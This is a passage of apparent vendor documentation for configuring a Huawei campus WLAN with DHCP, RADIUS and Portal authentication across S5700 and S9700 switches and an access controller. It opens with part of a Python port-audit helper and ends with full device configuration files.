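    for block in parse_vrp_blocks(config_text):
        if not block[0].startswith("interface "):
            continue
        itf = interface_settings(block)
        if itf["name"] not in ap_ports:
            continue
        seen.add(itf["name"])
        problems = []
        if itf["pvid"] != mgmt_vlan:
            problems.append("PVID is %d, expected management VLAN %d"
                            % (itf["pvid"], mgmt_vlan))
        missing = required - itf["allow"]
        if missing:
            problems.append("allow-pass lacks VLAN(s) %s" % sorted(missing))
        if not itf["isolate"]:
            problems.append("port-isolate missing: clients behind different "
                            "APs on this switch can talk at Layer 2")
        if problems:
            findings[itf["name"]] = problems
    for name in ap_ports:
        if name not in seen:
            findings[name] = ["interface not configured"]
    return findings
```

Running audit_ap_ports(SAMPLE_CONFIG, AP_PORTS, 10, [101]) reports only GigabitEthernet0/0/3, with three findings; the same function applied to the S5700-2 file takes 20 and [102] instead.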

# On the S9700, add GE1/0/1 connected to the S5700-1 to VLAN 10 and VLAN 101,
GE1/0/2 connected to the S5700-2 to VLAN 20 and VLAN 102, GE1/0/3 connected to the
Controller to VLAN 300, GE1/0/4 connected to the upper-layer network to VLAN 101 and
VLAN 102, and GE1/0/5 and GE1/0/6 connected to the AC to Eth-Trunk 1. Add Eth-Trunk 1
to VLAN 100.
[HUAWEI] sysname S9700
[S9700] vlan batch 10 20 100 101 102 300
[S9700] interface gigabitethernet 1/0/1
[S9700-GigabitEthernet1/0/1] port link-type trunk
[S9700-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 101
[S9700-GigabitEthernet1/0/1] quit
[S9700] interface gigabitethernet 1/0/2
[S9700-GigabitEthernet1/0/2] port link-type trunk
[S9700-GigabitEthernet1/0/2] port trunk allow-pass vlan 20 102
[S9700-GigabitEthernet1/0/2] quit
[S9700] interface gigabitethernet 1/0/3
[S9700-GigabitEthernet1/0/3] port link-type trunk
[S9700-GigabitEthernet1/0/3] port trunk allow-pass vlan 300
[S9700-GigabitEthernet1/0/3] quit
[S9700] interface gigabitethernet 1/0/4
[S9700-GigabitEthernet1/0/4] port link-type trunk
[S9700-GigabitEthernet1/0/4] port trunk allow-pass vlan 101 102
[S9700-GigabitEthernet1/0/4] quit
[S9700] interface eth-trunk 1
[S9700-Eth-Trunk1] port link-type trunk
[S9700-Eth-Trunk1] port trunk allow-pass vlan 100
[S9700-Eth-Trunk1] trunkport gigabitethernet 1/0/5 1/0/6 //Add GE1/0/5 and GE1/0/6 to Eth-Trunk1.
[S9700-Eth-Trunk1] quit

# On the S9700, configure VLANIF 100 for communication with the AC and VLANIF 300
for communication with the Controller.
[S9700] interface vlanif100
[S9700-Vlanif100] ip address 10.23.100.10 24 //Configure an IP address for communication between the S9700 and AC.
[S9700-Vlanif100] quit
[S9700] interface vlanif300
[S9700-Vlanif300] ip address 10.23.30.10 24 //Configure an IP address for communication between the S9700 and Controller.
[S9700-Vlanif300] quit

# On the AC, add GE2/0/1 and GE2/0/2 connected to the S9700 to Eth-Trunk 1 and add Eth-
Trunk 1 to VLAN 100.
[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface eth-trunk 1
[AC-Eth-Trunk1] port link-type trunk
[AC-Eth-Trunk1] port trunk allow-pass vlan 100
[AC-Eth-Trunk1] trunkport gigabitethernet 2/0/1 2/0/2 //Add GE2/0/1 and GE2/0/2 to Eth-Trunk1.
[AC-Eth-Trunk1] quit

# Configure VLANIF 100 on the AC for communication with the S9700.
[AC] interface vlanif100
[AC-Vlanif100] ip address 10.23.100.1 24 //Configure an IP address for communication between the S9700 and AC.
[AC-Vlanif100] quit

Step 2 Configure the S9700 as a DHCP server to assign IP addresses to APs and STAs.
# Configure the S9700 to assign IP addresses to the STAs and APs from the global address
pool.
[S9700] dhcp enable
[S9700] interface vlanif 10 //Configure a global address pool to assign IP addresses to AP101 and AP102.
[S9700-Vlanif10] description manage_ap1
[S9700-Vlanif10] ip address 10.23.10.1 24
[S9700-Vlanif10] dhcp select global
[S9700-Vlanif10] quit
[S9700] ip pool manage_ap1
[S9700-ip-pool-manage_ap1] gateway-list 10.23.10.1
[S9700-ip-pool-manage_ap1] network 10.23.10.0 mask 255.255.255.0
[S9700-ip-pool-manage_ap1] option 43 sub-option 3 ip-address 10.23.100.1 //Since a Layer 3 network is deployed between the AC and APs, configure Option 43 to advertise the AC's IP address to the APs.
[S9700-ip-pool-manage_ap1] quit
[S9700] interface vlanif 20 //Configure a global address pool to assign IP addresses to AP201 and AP202.
[S9700-Vlanif20] description manage_ap2
[S9700-Vlanif20] ip address 10.23.20.1 24
[S9700-Vlanif20] dhcp select global
[S9700-Vlanif20] quit
[S9700] ip pool manage_ap2
[S9700-ip-pool-manage_ap2] gateway-list 10.23.20.1
[S9700-ip-pool-manage_ap2] network 10.23.20.0 mask 255.255.255.0
[S9700-ip-pool-manage_ap2] option 43 sub-option 3 ip-address 10.23.100.1 //Since a Layer 3 network is deployed between the AC and APs, configure Option 43 to advertise the AC's IP address to the APs.
[S9700-ip-pool-manage_ap2] quit
[S9700] interface vlanif 101 //Configure a global IP address pool to assign IP addresses to STAs connected to AP101 and AP102.
[S9700-Vlanif101] description manage_area1_sta
[S9700-Vlanif101] ip address 10.23.101.1 24
[S9700-Vlanif101] dhcp select global
[S9700-Vlanif101] quit
[S9700] ip pool manage_area1_sta
[S9700-ip-pool-manage_area1_sta] gateway-list 10.23.101.1
[S9700-ip-pool-manage_area1_sta] network 10.23.101.0 mask 255.255.255.0
[S9700-ip-pool-manage_area1_sta] quit
[S9700] interface vlanif 102 //Configure a global IP address pool to assign IP
addresses to STAs connected to AP201 and AP202.
[S9700-Vlanif102] description manage_area2_sta
[S9700-Vlanif102] ip address 10.23.102.1 24
[S9700-Vlanif102] dhcp select global
[S9700-Vlanif102] quit
[S9700] ip pool manage_area2_sta
[S9700-ip-pool-manage_area2_sta] gateway-list 10.23.102.1
[S9700-ip-pool-manage_area2_sta] network 10.23.102.0 mask 255.255.255.0
[S9700-ip-pool-manage_area2_sta] quit

# Configure a default route to the S9700 on the AC.


[AC] ip route-static 0.0.0.0 0.0.0.0 10.23.100.10

Step 3 Configure a RADIUS server template with authentication and accounting parameters,
bind it to an AAA domain, and configure Portal authentication.

# Configure a RADIUS server template on the AC, and configure authentication, accounting,
and authorization in the template.
[AC] radius-server template radius1 //Create the RADIUS server template radius1.
[AC-radius-radius1] radius-server authentication 10.23.30.1 1812 source ip-
address 10.23.100.1 weight 80 //Configure the active RADIUS authentication
server 1 and authentication port 1812. The AC uses the IP address 10.23.100.1 to
communicate with the active RADIUS authentication server 1.
[AC-radius-radius1] radius-server authentication 10.23.30.2 1812 source ip-
address 10.23.100.1 weight 80 //Configure the active RADIUS authentication
server 2 and authentication port 1812. The AC uses the IP address 10.23.100.1 to
communicate with the active RADIUS authentication server 2.
[AC-radius-radius1] radius-server authentication 10.23.30.3 1812 source ip-
address 10.23.100.1 weight 20 //Configure the standby RADIUS authentication
server, with the weight value lower than the active authentication server. Set
the authentication port number to 1812. The AC uses the IP address 10.23.100.1 to
communicate with the standby RADIUS authentication server.
[AC-radius-radius1] radius-server accounting 10.23.30.1 1813 source ip-address
10.23.100.1 weight 80 //Configure the active RADIUS accounting server 1 to
collect user login and logout information and set the accounting port number to
1813. The AC uses the IP address 10.23.100.1 to communicate with the active
RADIUS accounting server 1.
[AC-radius-radius1] radius-server accounting 10.23.30.2 1813 source ip-address
10.23.100.1 weight 80 //Configure the active RADIUS accounting server 2 to
collect user login and logout information and set the accounting port number to
1813. The AC uses the IP address 10.23.100.1 to communicate with the active
RADIUS accounting server 2.
[AC-radius-radius1] radius-server accounting 10.23.30.3 1813 source ip-address
10.23.100.1 weight 20 //Configure the standby RADIUS accounting server, with
the weight value lower than the active accounting server. Set the accounting port
number to 1813. The AC uses the IP address 10.23.100.1 to communicate with the
standby RADIUS accounting server.
[AC-radius-radius1] radius-server shared-key cipher Admin@123 //Configure the
shared key for the RADIUS server.
[AC-radius-radius1] radius-server detect-server interval 30 //Set the RADIUS
automatic detection interval to 30s. The default value is 60s.
[AC-radius-radius1] quit
[AC] aaa
[AC-aaa] authentication-scheme radius1 //Create the authentication scheme
radius1.
[AC-aaa-authen-radius1] authentication-mode radius //If the Controller
functions as the RADIUS server, the authentication mode must be set to RADIUS.
[AC-aaa-authen-radius1] quit

[AC-aaa] accounting-scheme radius1 //Create the accounting scheme radius1.


[AC-aaa-accounting-radius1] accounting-mode radius //Set the accounting mode to
RADIUS. To facilitate account status information maintenance on the RADIUS
server, including the login and logout information, and forced logout
information, the accounting mode must be set to radius.
[AC-aaa-accounting-radius1] accounting realtime 15 //Enable real-time
accounting and set the accounting interval to 15 minutes. By default, real-time
accounting is disabled.
[AC-aaa-accounting-radius1] quit
[AC-aaa] domain portal1 //Create the domain portal1.
[AC-aaa-domain-portal1] authentication-scheme radius1 //Bind the authentication
scheme radius1.
[AC-aaa-domain-portal1] accounting-scheme radius1 //Bind the accounting scheme
radius1.
[AC-aaa-domain-portal1] radius-server radius1 //Bind the RADIUS server template
radius1.
[AC-aaa-domain-portal1] quit
[AC-aaa] quit

# Configure a Portal server template for each of the three Controllers.


[AC] web-auth-server portal1 //Create the Portal server template portal1 for
Controller1.
[AC-web-auth-server-portal1] server-ip 10.23.30.1 //Configure an IP address for
the Portal server.
[AC-web-auth-server-portal1] port 50100 //Set the destination port number used
by the device to send packets to the Portal server to 50100 (default setting).
[AC-web-auth-server-portal1] shared-key cipher Admin@123 //Configure the shared
key for message exchange between the AC and Portal server.
[AC-web-auth-server-portal1] url http://10.23.30.1:8080/portal //Configure the
URL to the Portal server.
[AC-web-auth-server-portal1] server-detect interval 30 action log //Set the
Portal server detection interval to 30s and log a state change. The default
interval is 60s.
[AC-web-auth-server-portal1] quit
[AC] web-auth-server portal2 //Create the Portal server template portal2 for
Controller2.
[AC-web-auth-server-portal2] server-ip 10.23.30.2
[AC-web-auth-server-portal2] port 50100
[AC-web-auth-server-portal2] shared-key cipher Admin@123
[AC-web-auth-server-portal2] url http://10.23.30.2:8080/portal
[AC-web-auth-server-portal2] server-detect interval 30 action log
[AC-web-auth-server-portal2] quit
[AC] web-auth-server portal3 //Create the Portal server template portal3 for
Controller3.
[AC-web-auth-server-portal3] server-ip 10.23.30.3
[AC-web-auth-server-portal3] port 50100
[AC-web-auth-server-portal3] shared-key cipher Admin@123
[AC-web-auth-server-portal3] url http://10.23.30.3:8080/portal
[AC-web-auth-server-portal3] server-detect interval 30 action log
[AC-web-auth-server-portal3] quit

# Configure Portal authentication.


[AC] portal-access-profile name portal1
[AC-portal-acces-profile-portal1] web-auth-server portal1 portal3 layer3 //Bind
the Portal server template portal1 and portal3.
[AC-portal-acces-profile-portal1] quit
[AC] portal-access-profile name portal2
[AC-portal-acces-profile-portal2] web-auth-server portal2 portal3 layer3
[AC-portal-acces-profile-portal2] quit
[AC] authentication-profile name portal1
[AC-authen-profile-portal1] portal-access-profile portal1
[AC-authen-profile-portal1] access-domain portal1 force //Configure the forcible
user domain portal1.
[AC-authen-profile-portal1] access-domain portal1 //Configure the default user
domain portal1.
[AC-authen-profile-portal1] quit
[AC] authentication-profile name portal2
[AC-authen-profile-portal2] portal-access-profile portal2
[AC-authen-profile-portal2] access-domain portal1 force

[AC-authen-profile-portal2] access-domain portal1


[AC-authen-profile-portal2] quit

# Bind the authentication profiles to the service VLANIF interfaces.


[AC] vlan batch 101 102
[AC] interface vlanif 101
[AC-Vlanif101] authentication-profile portal1
[AC-Vlanif101] quit
[AC] interface vlanif 102
[AC-Vlanif102] authentication-profile portal2
[AC-Vlanif102] quit

Step 4 Configure the APs to go online.


# Create the AP groups ap-group1 (first floor) and ap-group2 (second floor).
[AC] wlan
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] quit
[AC-wlan-view] ap-group name ap-group2
[AC-wlan-ap-group-ap-group2] quit

# Create a regulatory domain profile, configure the AC country code in the profile, and apply
the profile to both AP groups.
[AC-wlan-view] regulatory-domain-profile name domain1
[AC-wlan-regulate-domain-domain1] country-code cn //Configure the AC country
code. Radio features of APs managed by the AC must conform to local laws and
regulations. The default country code is CN.
[AC-wlan-regulate-domain-domain1] quit
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain
configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-ap-group1] quit
[AC-wlan-view] ap-group name ap-group2
[AC-wlan-ap-group-ap-group2] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain
configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-ap-group2] quit
[AC-wlan-view] quit

# Configure the AC's source interface.


[AC] capwap source interface vlanif 100

# Import the AP offline on the AC.


[AC] wlan
[AC-wlan-view] ap auth-mode mac-auth
[AC-wlan-view] ap-id 101 ap-mac 60de-4476-e320
[AC-wlan-ap-101] ap-name ap-101
[AC-wlan-ap-101] ap-group ap-group1 //Add APs on the first floor to ap-group1.
Warning: This operation may cause AP reset. If the country code changes, it will
clear channel, power and antenna gain configurations of the radio, Whether to
continue? [Y/N]:y
[AC-wlan-ap-101] quit
[AC-wlan-view] ap-id 102 ap-mac 60de-4476-e340
[AC-wlan-ap-102] ap-name ap-102
[AC-wlan-ap-102] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will
clear channel, power and antenna gain configurations of the radio, Whether to
continue? [Y/N]:y
[AC-wlan-ap-102] quit
[AC-wlan-view] ap-id 201 ap-mac 60de-4476-e360
[AC-wlan-ap-201] ap-name ap-201
[AC-wlan-ap-201] ap-group ap-group2 //Add APs on the second floor to ap-group2.

Warning: This operation may cause AP reset. If the country code changes, it will
clear channel, power and antenna gain configurations of the radio, Whether to
continue? [Y/N]:y
[AC-wlan-ap-201] quit
[AC-wlan-view] ap-id 202 ap-mac 60de-4476-e380
[AC-wlan-ap-202] ap-name ap-202
[AC-wlan-ap-202] ap-group ap-group2
Warning: This operation may cause AP reset. If the country code changes, it will
clear channel, power and antenna gain configurations of the radio, Whether to
continue? [Y/N]:y
[AC-wlan-ap-202] quit

# After the APs are powered on, run the display ap all command to check the AP state. If the
State field is displayed as nor, the AP has gone online normally. The IP column must show an
address from the AP management pool of the AP's floor (10.23.10.0/24 for ap-group1,
10.23.20.0/24 for ap-group2); an address from a STA segment indicates the AP came up in the
wrong VLAN.
[AC-wlan-view] display ap all
Total AP information:
nor  : normal          [4]
-------------------------------------------------------------------------------------------
ID   MAC            Name    Group      IP            Type          State  STA  Uptime
-------------------------------------------------------------------------------------------
101  60de-4476-e320 ap-101  ap-group1  10.23.10.254  AP6010DN-AGN  nor    0    10S
102  60de-4476-e340 ap-102  ap-group1  10.23.10.253  AP6010DN-AGN  nor    0    15S
201  60de-4476-e360 ap-201  ap-group2  10.23.20.254  AP6010DN-AGN  nor    0    45S
202  60de-4476-e380 ap-202  ap-group2  10.23.20.253  AP6010DN-AGN  nor    0    49S
-------------------------------------------------------------------------------------------
Total: 4

Step 5 Configure WLAN service parameters.

# Create RRM profile rrm1.


[AC-wlan-view] rrm-profile name rrm1
[AC-wlan-rrm-prof-rrm1] calibrate auto-channel-select disable //Disable automatic
channel selection so that the channel configured on each radio stays fixed.
[AC-wlan-rrm-prof-rrm1] calibrate auto-txpower-select disable //Disable automatic
transmit power selection so that the power configured on each radio stays fixed.
[AC-wlan-rrm-prof-rrm1] quit

# Create radio profiles radio-2g and radio-5g and bind rrm1 to the radio profiles.
[AC-wlan-view] radio-2g-profile name radio-2g
[AC-wlan-radio-2g-prof-radio-2g] rrm-profile rrm1
[AC-wlan-radio-2g-prof-radio-2g] quit
[AC-wlan-view] radio-5g-profile name radio-5g
[AC-wlan-radio-5g-prof-radio-5g] rrm-profile rrm1
[AC-wlan-radio-5g-prof-radio-5g] quit

# Create security profile wlan-security and set the security policy in the profile.
[AC-wlan-view] security-profile name wlan-security //Portal authentication has
been enabled on the interface, so the security policy is left at OPEN (default
setting): no link-layer authentication and no over-the-air encryption. Portal only
controls network access; STA traffic on this SSID is not encrypted between STA
and AP.
[AC-wlan-sec-prof-wlan-security] quit

# Create SSID profile wlan-ssid and set the SSID name to city-wlan.
[AC-wlan-view] ssid-profile name wlan-ssid
[AC-wlan-ssid-prof-wlan-ssid] ssid city-wlan //Set the SSID to city-wlan.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-ssid-prof-wlan-ssid] quit

# Create traffic profile traffic1 and configure Layer 2 user isolation.

[AC-wlan-view] traffic-profile name traffic1


[AC-wlan-traffic-prof-traffic1] user-isolate l2 //STAs on the same VAP cannot
reach each other at Layer 2.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-traffic-prof-traffic1] quit

# Create VAP profiles wlan-vap1 and wlan-vap2, configure the data forwarding mode and
service VLANs, and apply the security profile, SSID profile, and authentication profile to the
VAP profile.
[AC-wlan-view] vap-profile name wlan-vap1
[AC-wlan-vap-prof-wlan-vap1] forward-mode direct-forward //Set the service data
forwarding mode to direct forwarding (the default): STA traffic enters the service
VLAN at the AP instead of being tunneled to the AC.
[AC-wlan-vap-prof-wlan-vap1] service-vlan vlan-id 101 //Set the VLAN ID to 101.
By default, the VLAN ID is 1.
[AC-wlan-vap-prof-wlan-vap1] security-profile wlan-security
[AC-wlan-vap-prof-wlan-vap1] ssid-profile wlan-ssid
[AC-wlan-vap-prof-wlan-vap1] traffic-profile traffic1
[AC-wlan-vap-prof-wlan-vap1] quit
[AC-wlan-view] vap-profile name wlan-vap2
[AC-wlan-vap-prof-wlan-vap2] forward-mode direct-forward //Set the service data
forwarding mode to direct forwarding.
[AC-wlan-vap-prof-wlan-vap2] service-vlan vlan-id 102
[AC-wlan-vap-prof-wlan-vap2] security-profile wlan-security
[AC-wlan-vap-prof-wlan-vap2] ssid-profile wlan-ssid
[AC-wlan-vap-prof-wlan-vap2] traffic-profile traffic1
[AC-wlan-vap-prof-wlan-vap2] quit

# Bind the VAP profiles and radio profiles to the AP groups.


[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap1 wlan 1 radio 0
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap1 wlan 1 radio 1
[AC-wlan-ap-group-ap-group1] radio-2g-profile radio-2g
[AC-wlan-ap-group-ap-group1] radio-5g-profile radio-5g
[AC-wlan-ap-group-ap-group1] quit
[AC-wlan-view] ap-group name ap-group2
[AC-wlan-ap-group-ap-group2] vap-profile wlan-vap2 wlan 1 radio 0
[AC-wlan-ap-group-ap-group2] vap-profile wlan-vap2 wlan 1 radio 1
[AC-wlan-ap-group-ap-group2] radio-2g-profile radio-2g
[AC-wlan-ap-group-ap-group2] radio-5g-profile radio-5g
[AC-wlan-ap-group-ap-group2] quit

Step 6 Configure the AP radios and deliver the configuration to the APs.


# Configure the channel and transmit power of each radio (these stay fixed because
automatic calibration is disabled in rrm1).
[AC-wlan-view] ap-id 101
[AC-wlan-ap-101] radio 0
[AC-wlan-radio-101/0] channel 20mhz 1 //Configure the channel based on the
planning result of the WLAN Planner.
[AC-wlan-radio-101/0] eirp 10 //Configure the power based on the planning result
of the WLAN Planner.
[AC-wlan-radio-101/0] quit
[AC-wlan-ap-101] radio 1
[AC-wlan-radio-101/1] channel 20mhz 153
[AC-wlan-radio-101/1] eirp 10
[AC-wlan-radio-101/1] quit
[AC-wlan-ap-101] quit
[AC-wlan-view] ap-id 102
[AC-wlan-ap-102] radio 0
[AC-wlan-radio-102/0] channel 20mhz 6
[AC-wlan-radio-102/0] eirp 10
[AC-wlan-radio-102/0] quit
[AC-wlan-ap-102] radio 1
[AC-wlan-radio-102/1] channel 20mhz 161
[AC-wlan-radio-102/1] eirp 10
[AC-wlan-radio-102/1] quit
[AC-wlan-ap-102] quit
[AC-wlan-view] ap-id 201
[AC-wlan-ap-201] radio 0

[AC-wlan-radio-201/0] channel 20mhz 1


[AC-wlan-radio-201/0] eirp 10
[AC-wlan-radio-201/0] quit
[AC-wlan-ap-201] radio 1
[AC-wlan-radio-201/1] channel 20mhz 153
[AC-wlan-radio-201/1] eirp 10
[AC-wlan-radio-201/1] quit
[AC-wlan-ap-201] quit
[AC-wlan-view] ap-id 202
[AC-wlan-ap-202] radio 0
[AC-wlan-radio-202/0] channel 20mhz 6
[AC-wlan-radio-202/0] eirp 10
[AC-wlan-radio-202/0] quit
[AC-wlan-ap-202] radio 1
[AC-wlan-radio-202/1] channel 20mhz 161
[AC-wlan-radio-202/1] eirp 10
[AC-wlan-radio-202/1] quit
[AC-wlan-ap-202] quit

# Deliver the configuration to the APs.


[AC-wlan-view] commit all //After the WLAN service configuration is complete on
the AC, the configuration takes effect after you deliver it to the APs.
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 7 Verify the configuration.


# After the configuration is complete, run the display vap all command. The command output
shows that VAPs have been created.
[AC-wlan-view] display vap all
WID : WLAN ID
----------------------------------------------------------------------------------
AP ID AP name RfID WID BSSID Status Auth type STA SSID
----------------------------------------------------------------------------------
101 ap-101 0 1 60DE-4476-E320 ON OPEN 0 city-wlan
101 ap-101 1 1 60DE-4476-E330 ON OPEN 0 city-wlan
102 ap-102 0 1 60DE-4476-E340 ON OPEN 0 city-wlan
102 ap-102 1 1 60DE-4476-E350 ON OPEN 0 city-wlan
201 ap-201 0 1 60DE-4476-E360 ON OPEN 0 city-wlan
201 ap-201 1 1 60DE-4476-E370 ON OPEN 0 city-wlan
202 ap-202 0 1 60DE-4476-E380 ON OPEN 0 city-wlan
202 ap-202 1 1 60DE-4476-E390 ON OPEN 0 city-wlan
----------------------------------------------------------------------------------
Total: 8

# STAs discover the WLAN with the SSID city-wlan and associate with the WLAN. The STAs are
allocated IP addresses. Because the security policy is OPEN, no key is required to associate;
after users pass Portal authentication (user name and password entered on the Portal page and
checked by the RADIUS server), the STAs can access the network. Run the display station all
command on the AC. The command output shows that the STAs have connected to the WLAN
city-wlan.
[AC-wlan-view] display station all
Rf/WLAN: Radio ID/WLAN ID
Rx/Tx: link receive rate/link transmit rate(Mbps)
-------------------------------------------------------------------------------------------
STA MAC         AP ID  Ap name  Rf/WLAN  Band  Type  Rx/Tx  RSSI  VLAN  IP address     SSID
-------------------------------------------------------------------------------------------
14cf-9208-9abf  101    ap-101   0/1      2.4G  11n   3/8    -70   101   10.23.101.254  city-wlan
-------------------------------------------------------------------------------------------
Total: 1   2.4G: 1   5G: 0

# STAs and PCs obtain IP addresses and connect to the network normally.
----End

Configuration Files
l Configuration file of the S5700-1 connected to the first-floor APs (AP101 and AP102)
#
sysname S5700-1
#
vlan batch 10 101
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk allow-pass vlan 10 101
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk pvid vlan 10
port trunk allow-pass vlan 10 101
port-isolate enable group 1
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk pvid vlan 10
port trunk allow-pass vlan 10 101
port-isolate enable group 1
#
return

l Configuration file of the S5700-2 connected to the second-floor APs (AP201 and AP202)


#
sysname S5700-2
#
vlan batch 20 102
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk allow-pass vlan 20 102
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk pvid vlan 20
port trunk allow-pass vlan 20 102
port-isolate enable group 1
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk pvid vlan 20
port trunk allow-pass vlan 20 102
port-isolate enable group 1
#
return

l Configuration file of the S9700


#
sysname S9700
#
vlan batch 10 20 100 to 102 300
#
dhcp enable
#
ip pool manage_ap1
gateway-list 10.23.10.1
network 10.23.10.0 mask 255.255.255.0
option 43 sub-option 3 ip-address 10.23.100.1
#
ip pool manage_ap2
gateway-list 10.23.20.1
network 10.23.20.0 mask 255.255.255.0
option 43 sub-option 3 ip-address 10.23.100.1
#
ip pool manage_area1_sta

gateway-list 10.23.101.1
network 10.23.101.0 mask 255.255.255.0
#
ip pool manage_area2_sta
gateway-list 10.23.102.1
network 10.23.102.0 mask 255.255.255.0
#
interface Vlanif10
description manage_ap1
ip address 10.23.10.1 255.255.255.0
dhcp select global
#
interface Vlanif20
description manage_ap2
ip address 10.23.20.1 255.255.255.0
dhcp select global
#
interface Vlanif100
ip address 10.23.100.10 255.255.255.0
#
interface Vlanif101
description manage_area1_sta
ip address 10.23.101.1 255.255.255.0
dhcp select global
#
interface Vlanif102
description manage_area2_sta
ip address 10.23.102.1 255.255.255.0
dhcp select global
#
interface Vlanif300
ip address 10.23.30.10 255.255.255.0
#
interface Eth-Trunk1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10 101
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20 102
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 300
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 101 to 102
#
interface GigabitEthernet1/0/5
eth-trunk 1
#
interface GigabitEthernet1/0/6
eth-trunk 1
#
return
l Configuration file of the AC
#
sysname AC
#
vlan batch 100 to 102
#
authentication-profile name portal1
portal-access-profile portal1
access-domain portal1

access-domain portal1 force


authentication-profile name portal2
portal-access-profile portal2
access-domain portal1
access-domain portal1 force
#
radius-server template radius1
radius-server shared-key cipher %^%#~!W(.rpP$Psx"U>yy2uGMbJf-c.>vIWU[@V85Qe*%^%#
radius-server authentication 10.23.30.1 1812 source ip-address 10.23.100.1
weight 80
radius-server authentication 10.23.30.2 1812 source ip-address 10.23.100.1
weight 80
radius-server authentication 10.23.30.3 1812 source ip-address 10.23.100.1
weight 20
radius-server accounting 10.23.30.1 1813 source ip-address 10.23.100.1
weight 80
radius-server accounting 10.23.30.2 1813 source ip-address 10.23.100.1
weight 80
radius-server accounting 10.23.30.3 1813 source ip-address 10.23.100.1
weight 20
radius-server detect-server interval 30
#
web-auth-server portal1
server-ip 10.23.30.1
port 50100
shared-key cipher %^%#T)1I)52A-*iIrZ>='1l:P[[TYo!BX7_Z/AJkCGxC%^%#
url http://10.23.30.1:8080/portal
server-detect interval 30 action log
#
web-auth-server portal2
server-ip 10.23.30.2
port 50100
shared-key cipher %^%#"xJ,SrfdB4>n]ZAJ@|0IG`g@JAT"m81Jv8R3I{CM%^%#
url http://10.23.30.2:8080/portal
server-detect interval 30 action log
#
web-auth-server portal3
server-ip 10.23.30.3
port 50100
shared-key cipher %^%#dS6|(!NeF>qv;O7bJ[5D^QF"5#Na<,AG4b~y@3[(%^%#
url http://10.23.30.3:8080/portal
server-detect interval 30 action log
#
portal-access-profile name portal1
web-auth-server portal1 portal3 layer3
#
portal-access-profile name portal2
web-auth-server portal2 portal3 layer3
#
aaa
authentication-scheme radius1
authentication-mode radius
accounting-scheme radius1
accounting-mode radius
accounting realtime 15
domain portal1
authentication-scheme radius1
accounting-scheme radius1
radius-server radius1
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
#
interface Vlanif101
authentication-profile portal1
#
interface Vlanif102
authentication-profile portal2

#
interface Eth-Trunk1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet2/0/1
eth-trunk 1
#
interface GigabitEthernet2/0/2
eth-trunk 1
#
ip route-static 0.0.0.0 0.0.0.0 10.23.100.10
#
capwap source interface vlanif100
#
wlan
traffic-profile name traffic1
user-isolate l2
security-profile name wlan-security
ssid-profile name wlan-ssid
ssid city-wlan
vap-profile name wlan-vap1
service-vlan vlan-id 101
ssid-profile wlan-ssid
security-profile wlan-security
traffic-profile traffic1
authentication-profile portal1
vap-profile name wlan-vap2
service-vlan vlan-id 102
ssid-profile wlan-ssid
security-profile wlan-security
traffic-profile traffic1
regulatory-domain-profile name domain1
rrm-profile name rrm1
calibrate auto-channel-select disable
calibrate auto-txpower-select disable
radio-2g-profile name radio-2g
rrm-profile rrm1
radio-5g-profile name radio-5g
rrm-profile rrm1
ap-group name ap-group1
regulatory-domain-profile domain1
radio 0
radio-2g-profile radio-2g
radio-5g-profile radio-5g
vap-profile wlan-vap1 wlan 1
radio 1
radio-5g-profile radio-5g
vap-profile wlan-vap1 wlan 1
radio 2
radio-2g-profile radio-2g
radio-5g-profile radio-5g
vap-profile wlan-vap1 wlan 1
ap-group name ap-group2
regulatory-domain-profile domain1
radio 0
radio-2g-profile radio-2g
radio-5g-profile radio-5g
vap-profile wlan-vap2 wlan 1
radio 1
radio-5g-profile radio-5g
vap-profile wlan-vap2 wlan 1
radio 2
radio-2g-profile radio-2g
radio-5g-profile radio-5g
vap-profile wlan-vap2 wlan 1
ap-id 101 ap-mac 60de-4476-e320 ap-sn 210235419610CB002000
ap-name ap-101
ap-group ap-group1
radio 0

channel 20mhz 1
eirp 10
radio 1
channel 20mhz 153
eirp 10
ap-id 102 ap-mac 60de-4476-e340 ap-sn 210235419610CB003333
ap-name ap-102
ap-group ap-group1
radio 0
channel 20mhz 6
eirp 10
radio 1
channel 20mhz 161
eirp 10
ap-id 201 ap-mac 60de-4476-e360 ap-sn 210235419610CB002287
ap-name ap-201
ap-group ap-group2
radio 0
channel 20mhz 1
eirp 10
radio 1
channel 20mhz 153
eirp 10
ap-id 202 ap-mac 60de-4476-e380 ap-sn 210235419610CB002299
ap-name ap-202
ap-group ap-group2
radio 0
channel 20mhz 6
eirp 10
radio 1
channel 20mhz 161
eirp 10
#
return
